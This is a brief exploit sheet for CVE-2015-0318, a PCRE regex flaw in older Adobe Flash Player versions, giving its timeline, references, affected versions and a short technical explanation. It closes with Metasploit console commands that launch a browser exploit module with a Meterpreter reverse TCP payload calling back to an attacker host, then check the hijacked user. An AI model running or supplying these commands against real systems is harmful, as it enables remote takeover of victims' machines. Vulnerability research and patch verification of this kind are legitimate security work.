CVE-2015-0318 Adobe Flash Player PCRE Regex Vulnerability

Timeline :

Vulnerability discovered and reported to the vendor by Mark Brand and Natalie Silvanovich of Google Project Zero the 2014-11-25
Patched by the vendor through APSB15-04 the 2015-02-05
Details of the vulnerability provided by Google Project Zero the 2015-02-12

PoC provided by :

Mark Brand
sinn3r

Reference(s) :

CVE-2015-0318
APSB15-04

Affected version(s) :

Adobe Flash Player 16.0.0.296 and earlier versions

Tested onĀ :

Windows 7 SP1 with Internet Explorer 8 and Adobe Flash Player 16.0.0.235

Description :

This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error in the PCRE engine, specifically in the handling of the \c escape sequence when followed by a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.

Commands :

use exploit/windows/browser/adobe_flash_pcre
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid